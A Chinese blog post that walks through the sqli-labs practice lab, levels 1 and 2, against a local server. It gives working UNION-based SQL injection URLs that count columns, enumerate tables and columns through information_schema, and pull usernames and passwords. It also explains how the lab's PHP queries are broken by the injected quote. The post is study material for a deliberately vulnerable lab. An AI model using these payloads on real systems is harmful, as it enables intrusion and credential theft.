sqli-labs(1)-Less-1&2

最新推荐文章于 2020-12-26 23:44:32 发布
最新推荐文章于 2020-12-26 23:44:32 发布
阅读量185 收藏
点赞数 1
分类专栏: Sqli-labs 文章标签: sqli-labs1 sqli-labs2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30039205/article/details/104572186
版权

为什么要把这个两个放一起写在博客里呢,因为这两个非常像
当然也有人和我一样不懂为啥他们有的带’,有的又不带,还有带括号的,很多,其实我觉得都是经验之谈

推荐一个i春秋上的帖子,挂上链接,可以看一下,写的挺好的
深入浅出玩转SQL注入(含过狗)

开始我们的题目,sql注入在有的教程里分什么字符型,数字型,其实都是一样的,都是在满足sql查询的条件,同时为什么这么构造,我们也在最后再说

Sql注入基本方法

  1. 判断Sql注入,在最后加上’ ,如果出错,可以判断存在sql注入
  2. 爆数据库
  3. 爆表名
  4. 爆字段名
  5. 查询

第一题

  1. 判断 + ’
    http://127.0.0.1/sqli-labs-kali2/Less-1/?id=1%27

在这里插入图片描述
页面报错,存在sql注入

  1. 爆数据库
    查看回显的字段数

    网址页面提示是否正常
    http://127.0.0.1/sqli-labs-kali2/Less-1/?id=1’ order by 5 --+Unknown column ‘5’ in ‘order clause’
    http://127.0.0.1/sqli-labs-kali2/Less-1/?id=1’ order by 3 --+-
    http://127.0.0.1/sqli-labs-kali2/Less-1/?id=1’ order by 4 --+Unknown column ‘4’ in ‘order clause’

    说明字段数是3

    查看回显字段
    http://127.0.0.1/sqli-labs-kali2/Less-1/?id=-1’ union select 1,2,3–+

    说明回显字段是2,3
    在这里插入图片描述
    查看数据库名和数据库版本
    http://127.0.0.1/sqli-labs-kali2/Less-1/?id=-1’ union select 1,version(),database() --+
    在这里插入图片描述
    数据库名是security,版本是10.3.15-MariaDB-1

  2. 爆表名
    http://127.0.0.1/sqli-labs-kali2/Less-1/?id=-1’ union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=0x7365637572697479–+

在这里插入图片描述
这个0x7365637572697479是security的16进制形式,写成16进制的形式是不用加引号的,可以看到有email,referers,uagents,users,表

  1. 爆字段名

http://127.0.0.1/sqli-labs-kali2/Less-1/?id=-1‘ union select 1,group_concat(column_name),database() from information_schema.columns where table_schema=0x7365637572697479–+
在这里插入图片描述

  1. 查看数据

http://127.0.0.1/sqli-labs-kali2/Less-1/?id=-1’ union select 1,username,password from users where id=1 --+

第二题

第二题和第一题不一样的是在id=1之后的引号以及最后的–+上
我们直接贴上结果

  1. http://127.0.0.1/sqli-labs-kali2/Less-1/?id=1 order by 3
  2. http://127.0.0.1/sqli-labs-kali2/Less-1/?id=-1 union select 1,version(),database()
  3. http://127.0.0.1/sqli-labs-kali2/Less-1/?id=-1 union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=0x7365637572697479
  4. http://127.0.0.1/sqli-labs-kali2/Less-1/?id=-1 union select 1,group_concat(column_name),database() from information_schema.columns where table_schema=0x7365637572697479
  5. http://127.0.0.1/sqli-labs-kali2/Less-1/?id=-1 union select 1,username,password from users where id=1

比较

第一题在查看sql查询的源码的时候,php的语句是这么写的

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

所以我们在构造语句的时候都是在满足查询条件的语句
比如爆数据库,
http://127.0.0.1/sqli-labs-kali2/Less-1/?id=1’ order by 3 --+
这个时候,sql语句是什么

$sql="SELECT * FROM users WHERE id='1' order by 3 --+ LIMIT 0,1";

现在知道为啥要构造’了吧,为了满足查询语句的语法要求,而–+之后的会被sql语句忽略

在看看第二题,php的语句是这么写的

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

如果还是按照第一题一样的就是

$sql="SELECT * FROM users WHERE id=1' order by 3 --+ LIMIT 0,1";

这样语法就错误了,必须去掉引号

$sql="SELECT * FROM users WHERE id=1 order by 3 LIMIT 0,1";

这样就满足查询条件,成功查询
但是在实际的操作中,应该就是试

pup1L
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数(如?id=1' and 1=1),观察页面响应变化来判断是否存在注入。 - **闭合方式判断**:通过输入特殊字符(如\)来测试闭合方式,确认是单...
通过sqli-labs学习sql注入——基础挑战之less1-10
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
深入浅出玩转php一句话(含过waf新姿势)
wjy397的专栏
01-10 1万+
本帖最后由 sucppVK 于 2017-1-9 14:39 编辑 一、前言 本文原创作者:XXX,本文属i春秋原创奖励计划,未经许可禁止转载! 各个论坛出了不少过waf的一句话 可笔者见还是有不少小白没有理解一句话(只知道是拿来链接菜刀) 今天打算做一篇面向初学者的教程,总结知识点,抛砖引玉。 让小白从彻底理解马的含义,到打造属于自己过waf的马。 ----
sql-labs-less1/2|SQL注入
TenG的博客
09-18 920
前言: 此系类文章为SQL注入讲解,在本地搭建sql-labs环境进行sql注入,我也是刚开始学sql注入,本篇文章为sql-labs前两关注入讲解,后面的会在学过以后陆续发布,写此系类文章是为了以后方便回顾,也希望能够帮到大家,如果有不正确的地方欢迎指正,由于讲解比较详细,操作过程截图比较多,全文比较干,大家谅解、感谢支持。 所需环境: phpstudy,sql-labs 工具: hackbar,可以不用这个工具,只是为了方便一点,我用的是免费版的。 关卡: Less-1、Less-2 正文: Less-
sqli-labs Less-1~Less-4做题记录
Goodric的博客
12-13 221
以下使用sqli-labs靶场进行练习sql注入 关于靶场的搭建,可参考:https://blog.csdn.net/Goodric/article/details/110098085 Less-1 用 ?id=xxx 进行 get 请求,来判断是否存在 sql 注入, 可以在url中看到传递的参数。 输入 ?id=1 and 1 = 2 --+ ,回显正常,此处不是数字型注入。 再输入?id=1’ (后面一个), 回显不正常,可能存在sql注入漏洞, 大概率就是字符注入了。 get参数 1 被
sqli-labs靶场实现(六)【HTTP头中的SQL注入】(less-18~19(User-Agent、Referer)、具体步骤+图文详解)
weixin_46709219的博客
12-26 631
一)HTTP头中的SQL注入   1)HTTP头中的注入介绍   2)HTTP User-Agent注入   3)HTTP Referer注入   4)sqlmap安全测试 ———————————————————————————————————————————————————————— 一)HTTP头中的SQL注入 1)HTTP头中的注入介绍 上面代码中使用的方法解析: 1)check_input()——判断是否有输入一个变量$value 2)empty()——判断变量$value的值是否为空 3)
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
SQLi-LABS Page-1(Basic Challenges)
07-24
在"SQLi-LABS Page-1 (Basic Challenges)"中,一系列的关卡设计用于帮助学习者理解并实践SQL注入的基本概念和方法。 在CTF(Capture The Flag)网络安全挑战赛中,SQL注入是一种常见的技能测试。在这个挑战中,从...
sqli-lab教程——1-35通关Writeup
热门推荐
地址ch3nye.top
09-11 10万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
Sqli-Labs学习sql注入:Sqli-Labs less-1&2
vegetable_haker的博客
10-25 829
Sqli-Labs:Less-1 尝试传入参数 localhost/sqlilabs/Less-1/?id=1 localhost/sqlilabs/Less-1/?id=1' localhost/sqlilabs/Less-1/?id=1'' localhost/sqlilabs/Less-1/?id=1''' 在测试以上传参的时候发现第一和第三条的时候页面能正...
sqli-labs靶场实现(一)【GET基于报错SQL注入】(less-1~4、具体步骤+图文详解)
weixin_46709219的博客
12-12 712
一)GET基于报错SQL注入 1)SQL注入的分类 2)get基于报错SQL注入发现 3)get基于报错SQL注入利用 4)利用sqlmap测试 二) 三) —————————————————————————————————————————————————— 一)GET基于报错SQL注入 1)SQL注入的分类 2)get基于报错SQL注入发现 3)get基于报错SQL注入利用 4)利用sqlmap测试 ...
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
07-17
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
torchaudio-0.13.1+cpu-cp39-cp39-win_amd64.whl
最新发布
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
出入库存盘点表-图表分析-分类查询-Excel模板
07-17
【作品名称】:出入库存盘点表-图表分析-分类查询-Excel模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
torchaudio-0.12.1+cpu-cp37-cp37m-win_amd64.whl
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
中南大学机械设计课程设计说明书.doc
07-17
说明书
仓库进销出入库存管理系统(带库存预警)-Excel模版
07-17
【作品名称】:仓库进销出入库存管理系统(带库存预警)-Excel模版 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
sqli-labs-less1
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值